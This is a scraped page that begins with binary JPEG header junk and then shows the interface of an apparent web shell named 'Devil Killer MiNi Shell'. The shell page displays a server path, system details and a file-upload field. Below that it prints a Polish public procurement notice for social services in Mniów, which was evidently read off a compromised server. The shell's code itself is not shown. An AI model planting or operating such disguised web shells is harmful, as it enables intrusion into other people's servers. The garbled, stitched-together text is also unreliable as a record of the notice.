JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240518/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240518/0032973501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi społeczne z zakresu wsparcia rodziny, osób z niepełnosprawnościami i osób starszych dla uczestników projektu pn.: „Centrum Usług Społecznych w gminie Mniów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Społecznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 290421981</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Centralna 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48413737179</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cusmniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">cusmniow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi społeczne z zakresu wsparcia rodziny, osób z niepełnosprawnościami i osób starszych dla uczestników projektu pn.: „Centrum Usług Społecznych w gminie Mniów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ee1e2e1d-1363-11ef-a7f7-6221b72ad4fc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00329735</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00277910/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi społeczne z zakresu wsparcia rodziny, osób z niepełnosprawnościami i osób starszych uczestników projektu pn.: „Centrum Usług Społecznych w gminie Mniów&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Centrum Usług Społecznych w gminie Mniów </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ee1e2e1d-1363-11ef-a7f7-6221b72ad4fc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">12.1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>i.	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>ii.	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">25.1.	Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/><br/>25.2.	Zamawiający informuje, że:<br/><br/>1)	administratorem danych osobowych Wykonawcy jest Centrum Usług Społecznych w Mniowie ul. Centralna 2, 26-080 Mniów, adres e-mail sekretsariat@cusmniow.pl, tel. 41 37 37 179;<br/>2)	w sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych za pośrednictwem adresu email: inspektor@cbi24.pl lub pisemnie na adres Administratora<br/>3)	dane osobowe Wykonawcy będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego pn. Usługi społeczne z zakresu wsparcia rodziny, osób z niepełnosprawnościami i osób starszych uczestników projektu pn.: „Centrum Usług Społecznych w gminie Mniów” znak sprawy: GOPS.26.6.2024 oraz w celu archiwizacji dokumentacji dotyczącej tego postępowania;<br/>4)	odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp, podmioty kontrolujące, które zgodnie z obowiązującymi przepisami uzyskają wgląd do dokumentacji postępowania oraz podmioty i instytucje, które mają do tego wglądu prawo w toku realizacji zamówienia oraz po jej zakończeniu, skład orzekający Krajowej Izby Odwoławczej oraz jej pracownicy, w przypadku wniesienia odwołania oraz pełnomocnicy stron postępowania odwoławczego, skład orzekający oraz pracownicy sądu okręgowego w procesie skargowym, jeżeli ten będzie miał miejsce;<br/>5)	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, okres przechowywania obejmuje cały okres obowiązywania umowy.<br/>6)	Zamawiający informuje, że z uwagi na fakt iż postepowanie jest prowadzone w ramach projektu „Centrum Usług Społecznych w gminie Mniów” i wydatek jest współfinansowany ze środków Europejskiego Funduszu Społecznego Plus w ramach priorytetu 9 Usługi Społeczne i zdrowotne, Działanie 9.4 Zwiększenie dostępności do usług społecznych i zdrowotnych programu regionalnego Fundusze Europejskie dla Świętokrzyskiego 2021-2027 zobowiązany jest do przechowywania dokumentacji związanej z realizacją projektu przez okres pięciu lat od dnia 31 grudnia roku, w którym został zatwierdzony końcowy wniosek o płatność w ramach projektu. Bieg terminu, o którym mowa w zdaniu pierwszym, zostaje przerwany w przypadku wszczęcia postępowania administracyjnego lub sądowego dotyczącego wydatków rozliczonych w projekcie albo na należycie uzasadniony wniosek Komisji Europejskiej.<br/>7)	Zamawiający informuje, że Instytucja Pośrednicząca może przedłużyć termin, o którym mowa w pkt 6<br/><br/>Pełny tekst klauzuli RODO Zamawiający zamieszcza w Rozdziale 25. SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GOPS.26.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem zamówienia jest realizacja usług społecznych z zakresu wsparcia rodziny, osób z niepełnosprawnościami i osób starszych uczestników projektu pn.: „Centrum Usług Społecznych w gminie Mniów” w podziale na dwie części (część 1, część 2 ), na które dopuszcza się składanie ofert częściowych. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 9 do niniejszej Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85320000-8 - Usługi społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85310000-5 - Usługi pracy społecznej</p> <p class="mb-0">85323000-9 - Usługi zdrowotne świadczone na rzecz wspólnot</p> <p class="mb-0">85312400-3 - Usługi opieki społecznej nieświadczone przez ośrodki pobytowe</p> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena brutto oferty – waga 50%<br/>Liczba punktów = ( Cmin/Cof ) * 50 * waga<br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w badanej ofercie<br/>Koordynator – doświadczenie – waga 40%<br/>Minimalny warunek dotyczący posiadanego doświadczenia dla Koordynatora określono w pkt 6.2. ppkt 2) SWZ. Ocenie w kryterium będzie podlegać osoba wskazana na potwierdzenie warunku udziału w postępowaniu określonego w pkt 6.2. ppkt 2) SWZ.<br/><br/>1)	Punkty w tym kryterium przyznawane będą wg następujących zasad:<br/>-	za dysponowanie osobą, która wykaże się spełnieniem warunku w pkt 6.2. ppkt 2) SWZ, tj. w zakresie minimalnym, Wykonawca otrzyma 0 punktów;<br/>-	za każde kolejne zamówienie spełniające wymagania pkt 6.2. ppkt 2) SWZ, które Wykonawca wykazał w Informacji o koordynatorze jako doświadczenie Koordynatora, Wykonawca otrzyma 10 punktów;<br/>2)	W tym kryterium Wykonawca może maksymalnie uzyskać 40 punktów.<br/>3)	Jeżeli Wykonawca zamierza wykazać osobę, za której dysponowanie może otrzymać punkty w kryterium Wykonawca zobowiązany jest złożyć „Informację o koordynatorze” wraz z ofertą.<br/>4)	Ocenie w ramach kryterium oceny ofert „Koordynator – doświadczenie” będą podlegały jedynie informacje zawarte w „Informacji o koordynatorze” złożonym wraz z ofertą.<br/>5)	Jeżeli Wykonawca nie złoży wraz z ofertą „Informacji o koordynatorze” to otrzyma 0 (zero) punktów w przedmiotowym kryterium.<br/>6)	„Informacja o koordynatorze ” nie podlega uzupełnieniu w trybie ustawy Pzp ani zmianom lub uzupełnieniu poszczególnych zawartych w nim informacji. W przypadku braku informacji niezbędnych do oceny oferty w przedmiotowym kryterium Wykonawca otrzyma 0 (zero) punktów w zakresie, w którym stwierdzono braki.<br/>7)	Jeżeli na wezwanie Zamawiającego w trybie ustawy Pzp lub z własnej inicjatywy Wykonawca uzupełni lub poprawi lub udzieli wyjaśnień w zakresie „Wykazu osób” (na potrzeby wykazania spełniania warunku udziału w postępowaniu) i prowadzić to będzie do braku zgodności osoby wskazanej w „Informacji o koordynatorze” z osobą wskazaną w „Wykazie osób” Wykonawca otrzyma 0 (zero) punktów za doświadczenie tej osoby w przedmiotowym kryterium.<br/><br/>Kryterium społeczne zatrudnieniowe – waga 10% (tj. max 10 pkt.) <br/>Sposób obliczenia punktów:<br/>10 pkt za zatrudnienie na podstawie umowy o pracę bezpośrednio do realizacji zamówienia 1 osoby spośród osób zagrożonych wykluczeniem społecznym, w rozumieniu art. 2 pkt 6 ustawy z dnia 5 sierpnia 2022 r. o ekonomii społecznej (t.j. Dz.U. z 2024r. poz. 113),<br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w Formularzu ofertowym. W przypadku braku w Formularzu ofertowym deklaracji dotyczącej zatrudnienia osób spełniających warunki wskazane powyżej, Zamawiający nie przyzna wykonawcy punktów w tym kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koordynator – doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium społeczne zatrudnieniowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja usług społecznych z zakresu wsparcia rodziny, osób z niepełnosprawnościami i osób starszych uczestników projektu pn.: „Centrum Usług Społecznych w gminie Mniów” w podziale na dwie części (część 1, część 2 ), na które dopuszcza się składanie ofert częściowych. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 9 do niniejszej Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85320000-8 - Usługi społeczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</p> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85310000-5 - Usługi pracy społecznej</p> <p class="mb-0">85323000-9 - Usługi zdrowotne świadczone na rzecz wspólnot</p> <p class="mb-0">85312400-3 - Usługi opieki społecznej nieświadczone przez ośrodki pobytowe</p> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena brutto oferty – waga 50%<br/>Liczba punktów = ( Cmin/Cof ) * 50 * waga<br/>gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert<br/>- Cof - cena podana w badanej ofercie<br/>Koordynator – doświadczenie – waga 40%<br/>Minimalny warunek dotyczący posiadanego doświadczenia dla Koordynatora określono w pkt 6.2. ppkt 2) SWZ. Ocenie w kryterium będzie podlegać osoba wskazana na potwierdzenie warunku udziału w postępowaniu określonego w pkt 6.2. ppkt 2) SWZ.<br/><br/>1)	Punkty w tym kryterium przyznawane będą wg następujących zasad:<br/>-	za dysponowanie osobą, która wykaże się spełnieniem warunku w pkt 6.2. ppkt 2) SWZ, tj. w zakresie minimalnym, Wykonawca otrzyma 0 punktów;<br/>-	za każde kolejne zamówienie spełniające wymagania pkt 6.2. ppkt 2) SWZ, które Wykonawca wykazał w Informacji o koordynatorze jako doświadczenie Koordynatora, Wykonawca otrzyma 10 punktów;<br/>2)	W tym kryterium Wykonawca może maksymalnie uzyskać 40 punktów.<br/>3)	Jeżeli Wykonawca zamierza wykazać osobę, za której dysponowanie może otrzymać punkty w kryterium Wykonawca zobowiązany jest złożyć „Informację o koordynatorze” wraz z ofertą.<br/>4)	Ocenie w ramach kryterium oceny ofert „Koordynator – doświadczenie” będą podlegały jedynie informacje zawarte w „Informacji o koordynatorze” złożonym wraz z ofertą.<br/>5)	Jeżeli Wykonawca nie złoży wraz z ofertą „Informacji o koordynatorze” to otrzyma 0 (zero) punktów w przedmiotowym kryterium.<br/>6)	„Informacja o koordynatorze ” nie podlega uzupełnieniu w trybie ustawy Pzp ani zmianom lub uzupełnieniu poszczególnych zawartych w nim informacji. W przypadku braku informacji niezbędnych do oceny oferty w przedmiotowym kryterium Wykonawca otrzyma 0 (zero) punktów w zakresie, w którym stwierdzono braki.<br/>7)	Jeżeli na wezwanie Zamawiającego w trybie ustawy Pzp lub z własnej inicjatywy Wykonawca uzupełni lub poprawi lub udzieli wyjaśnień w zakresie „Wykazu osób” (na potrzeby wykazania spełniania warunku udziału w postępowaniu) i prowadzić to będzie do braku zgodności osoby wskazanej w „Informacji o koordynatorze” z osobą wskazaną w „Wykazie osób”, Wykonawca otrzyma 0 (zero) punktów za doświadczenie tej osoby w przedmiotowym kryterium.<br/><br/>Kryterium społeczne zatrudnieniowe – waga 10% (tj. max 10 pkt.) <br/>Sposób obliczenia punktów:<br/>10 pkt za zatrudnienie na podstawie umowy o pracę bezpośrednio do realizacji zamówienia 1 osoby spośród osób zagrożonych wykluczeniem społecznym, w rozumieniu art. 2 pkt 6 ustawy z dnia 5 sierpnia 2022 r. o ekonomii społecznej (t.j. Dz.U. z 2024r. poz. 113),<br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w Formularzu ofertowym. W przypadku braku w Formularzu ofertowym deklaracji dotyczącej zatrudnienia osób spełniających warunki wskazane powyżej, Zamawiający nie przyzna wykonawcy punktów w tym kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do 